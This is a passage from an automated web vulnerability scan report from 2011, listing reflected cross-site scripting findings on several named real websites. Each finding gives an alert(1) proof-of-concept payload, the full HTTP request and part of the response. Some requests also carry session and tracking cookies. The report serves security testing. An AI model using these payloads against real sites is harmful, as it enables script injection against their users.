Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: Thu, 12 May 2011 15:37:39 GMT
Content-Type: text/javascript; charset: UTF-8
Content-Length: 145899

// FILE NOT FOUND 'scripts/jquery/js/jquery-1.3.2.min.jsfd9b1
alert(1)//706f6bd3266
'

(function ($) {
$.fn.fadeTransition = function(options) {
var options = $.extend({pauseTime: 5000, transitionTime: 2000}, options);

Trans = function(obj) {
var timer = null;

...[SNIP]...

2.134. http://www.therepublic.com/assets/gzip.php [f0 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/gzip.php

Issue detail

The value of the f0 request parameter is copied into the HTML document as plain text between tags. The payload a75b1<img%20src%3da%20onerror%3dalert(1)>8444697b20 was submitted in the f0 parameter. This input was echoed as a75b1<img src=a onerror=alert(1)>8444697b20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /assets/gzip.php?cache=true&f0=scripts/jquery/css/smoothness/jquery-ui-1.7.2.custom.cssa75b1<img%20src%3da%20onerror%3dalert(1)>8444697b20&f1=scripts/menu/menu.css&f2=css/style.css HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:10 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: Thu, 12 May 2011 15:37:34 GMT
Content-Type: text/css; charset: UTF-8
Content-Length: 19325

// FILE NOT FOUND 'scripts/jquery/css/smoothness/jquery-ui-1.7.2.custom.cssa75b1<img src=a onerror=alert(1)>8444697b20'

div#menu{height:41px;background:url(http://hnemanagement.com/trassets/scripts/menu/images/main-bg.png) repeat-x;}
div#menu ul{margin:0;padding:0;list-style:none;float:left;}
div#menu ul.menu{padding
...[SNIP]...

2.135. http://www.therepublic.com/assets/gzip.php [f1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/gzip.php

Issue detail

The value of the f1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c9bb"%3balert(1)//3fa72bc3ee4 was submitted in the f1 parameter. This input was echoed as 1c9bb";alert(1)//3fa72bc3ee4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /assets/gzip.php?cache=true&f0=scripts/jquery/js/jquery-1.3.2.min.js&f1=scripts/jquery/js/jquery.fadetransition.js1c9bb"%3balert(1)//3fa72bc3ee4&f2=scripts/jquery/js/jquery-ui-1.7.2.custom.min.js&f3=scripts/menu/menu.js HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:16 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: Thu, 12 May 2011 15:37:40 GMT
Content-Type: text/javascript; charset: UTF-8
Content-Length: 202184

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
"offset"+G],document.documentElement["offset"+G]):K===g?(this.length?o.css(this[0],J):null):this.css(J,typeof K==="string"?K:K+"px")}})})();// FILE NOT FOUND 'scripts/jquery/js/jquery.fadetransition.js1c9bb";alert(1)//3fa72bc3ee4'

/*
* jQuery UI 1.7.2
*
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquer
...[SNIP]...

2.136. http://www.therepublic.com/assets/gzip.php [f1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/gzip.php

Issue detail

The value of the f1 request parameter is copied into the HTML document as plain text between tags. The payload 31990<img%20src%3da%20onerror%3dalert(1)>b9261ac9e98 was submitted in the f1 parameter. This input was echoed as 31990<img src=a onerror=alert(1)>b9261ac9e98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /assets/gzip.php?cache=true&f0=scripts/jquery/css/smoothness/jquery-ui-1.7.2.custom.css&f1=scripts/menu/menu.css31990<img%20src%3da%20onerror%3dalert(1)>b9261ac9e98&f2=css/style.css HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:12 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: Thu, 12 May 2011 15:37:36 GMT
Content-Type: text/css; charset: UTF-8
Content-Length: 39249

.ui-helper-hidden{display:none;}
.ui-helper-hidden-accessible{position:absolute;left:-99999999px;}
.ui-helper-reset{margin:0;padding:0;border:0;outline:0;line-height:1.3;text-decoration:none;font-size
...[SNIP]...
ted a{cursor:pointer;}
.ui-tabs .ui-tabs-panel{padding:1em 1.4em;display:block;border-width:0;background:none;}
.ui-tabs .ui-tabs-hide{display:none !important;}
// FILE NOT FOUND 'scripts/menu/menu.css31990<img src=a onerror=alert(1)>b9261ac9e98'

body{margin-top:0px;margin-right:0px;margin-left:0px;font-family:Verdana, Arial, Helvetica, sans-serif;font-size:expression(screen.deviceXDPI >
...[SNIP]...

2.137. http://www.therepublic.com/assets/gzip.php [f2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/gzip.php

Issue detail

The value of the f2 request parameter is copied into the HTML document as plain text between tags. The payload e3a85<img%20src%3da%20onerror%3dalert(1)>bdd1e370341 was submitted in the f2 parameter. This input was echoed as e3a85<img src=a onerror=alert(1)>bdd1e370341 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /assets/gzip.php?cache=true&f0=scripts/jquery/css/smoothness/jquery-ui-1.7.2.custom.css&f1=scripts/menu/menu.css&f2=css/style.csse3a85<img%20src%3da%20onerror%3dalert(1)>bdd1e370341 HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:13 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: Thu, 12 May 2011 15:37:37 GMT
Content-Type: text/css; charset: UTF-8
Content-Length: 24933

.ui-helper-hidden{display:none;}
.ui-helper-hidden-accessible{position:absolute;left:-99999999px;}
.ui-helper-reset{margin:0;padding:0;border:0;outline:0;line-height:1.3;text-decoration:none;font-size
...[SNIP]...
/menu/images/lava.png) no-repeat top left !important;background-image:url(http://hnemanagement.com/trassets/scripts/menu/images/lava.gif);height:44px;margin-right:8px;}
// FILE NOT FOUND 'css/style.csse3a85<img src=a onerror=alert(1)>bdd1e370341'


2.138. http://www.therepublic.com/assets/gzip.php [f2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/gzip.php

Issue detail

The value of the f2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5be3"%3balert(1)//d085caec6b1 was submitted in the f2 parameter. This input was echoed as a5be3";alert(1)//d085caec6b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /assets/gzip.php?cache=true&f0=scripts/jquery/js/jquery-1.3.2.min.js&f1=scripts/jquery/js/jquery.fadetransition.js&f2=scripts/jquery/js/jquery-ui-1.7.2.custom.min.jsa5be3"%3balert(1)//d085caec6b1&f3=scripts/menu/menu.js HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:16 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: Thu, 12 May 2011 15:37:40 GMT
Content-Type: text/javascript; charset: UTF-8
Content-Length: 71404

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
seTime);
};

cue();
}

return this.each(function() {
var t = new Trans(this);
});
}
})(jQuery);

// FILE NOT FOUND 'scripts/jquery/js/jquery-ui-1.7.2.custom.min.jsa5be3";alert(1)//d085caec6b1'

/** jquery.color.js ****************/
/*
* jQuery Color Animations
* Copyright 2007 John Resig
* Released under the MIT and GPL licenses.
*/

(function(jQuery){

   // We override the animation fo
...[SNIP]...

2.139. http://www.therepublic.com/assets/gzip.php [f3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/gzip.php

Issue detail

The value of the f3 request parameter is copied into a JavaScript rest-of-line comment. The payload b0ea5%0aalert(1)//a9a972eae26 was submitted in the f3 parameter. This input was echoed as b0ea5
alert(1)//a9a972eae26
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /assets/gzip.php?cache=true&f0=scripts/jquery/js/jquery-1.3.2.min.js&f1=scripts/jquery/js/jquery.fadetransition.js&f2=scripts/jquery/js/jquery-ui-1.7.2.custom.min.js&f3=scripts/menu/menu.jsb0ea5%0aalert(1)//a9a972eae26 HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: Thu, 12 May 2011 15:37:41 GMT
Content-Type: text/javascript; charset: UTF-8
Content-Length: 190058

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
ects.restore(e,d);if(h=="show"&&a.browser.msie){this.style.removeAttribute("filter")}if(b.callback){b.callback.apply(this,arguments)}e.dequeue()}})})}})(jQuery);;// FILE NOT FOUND 'scripts/menu/menu.jsb0ea5
alert(1)//a9a972eae26
'


2.140. http://www.therepublic.com/assets/gzip.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/gzip.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload 32c0d%0aalert(1)//b26abd85278 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 32c0d
alert(1)//b26abd85278
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /assets/gzip.php?cache=true&f0=scripts/jquery/js/jquery-1.3.2.min.js&f1=scripts/jquery/js/jquery.fadetransition.js&f2=scripts/jquery/js/jquery-ui-1.7.2.custom.min.js&f3=scripts/menu/men/32c0d%0aalert(1)//b26abd85278u.js HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: Thu, 12 May 2011 15:37:42 GMT
Content-Type: text/javascript; charset: UTF-8
Content-Length: 190059

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
effects.restore(e,d);if(h=="show"&&a.browser.msie){this.style.removeAttribute("filter")}if(b.callback){b.callback.apply(this,arguments)}e.dequeue()}})})}})(jQuery);;// FILE NOT FOUND 'scripts/menu/men/32c0d
alert(1)//b26abd85278
u.js'


2.141. http://www.therepublic.com/assets/gzip.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/gzip.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9454e<img%20src%3da%20onerror%3dalert(1)>a76a89d3b38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9454e<img src=a onerror=alert(1)>a76a89d3b38 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /assets/gzip.php?cache=true&f0=scripts/jquery/css/smoothness/jquery-ui-1.7.2.custom.css&f1=scripts/menu/menu.css&f2=css/style/9454e<img%20src%3da%20onerror%3dalert(1)>a76a89d3b38.css HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: Thu, 12 May 2011 15:37:38 GMT
Content-Type: text/css; charset: UTF-8
Content-Length: 24934

.ui-helper-hidden{display:none;}
.ui-helper-hidden-accessible{position:absolute;left:-99999999px;}
.ui-helper-reset{margin:0;padding:0;border:0;outline:0;line-height:1.3;text-decoration:none;font-size
...[SNIP]...
pts/menu/images/lava.png) no-repeat top left !important;background-image:url(http://hnemanagement.com/trassets/scripts/menu/images/lava.gif);height:44px;margin-right:8px;}
// FILE NOT FOUND 'css/style/9454e<img src=a onerror=alert(1)>a76a89d3b38.css'


2.142. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95704"-alert(1)-"f83d1186636 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=95704"-alert(1)-"f83d1186636
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BE57AD10F09BB732E508295DF3E17613; Path=/
Content-Type: text/javascript
Content-Length: 8047
Date: Mon, 09 May 2011 15:39:53 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.google.com/search?hl=en&q=95704"-alert(1)-"f83d1186636",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3
...[SNIP]...

2.143. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the C3UID cookie is copied into the HTML document as plain text between tags. The payload b640b<script>alert(1)</script>fe55219a755 was submitted in the C3UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803b640b<script>alert(1)</script>fe55219a755; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:05 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Thu, 12-May-2011 15:39:05 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-39-05_9323346991304955545; expires=Sat, 07-May-2016 15:39:05 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_9323346991304955545; expires=Mon, 09-May-2011 15:54:05 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803b640b<script>alert(1)</script>fe55219a755';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='9323346991304955545';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcal
...[SNIP]...

2.144. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 5b9d6<script>alert(1)</script>936b389d1ff was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=15b9d6<script>alert(1)</script>936b389d1ff; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:25 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:25 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:25 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
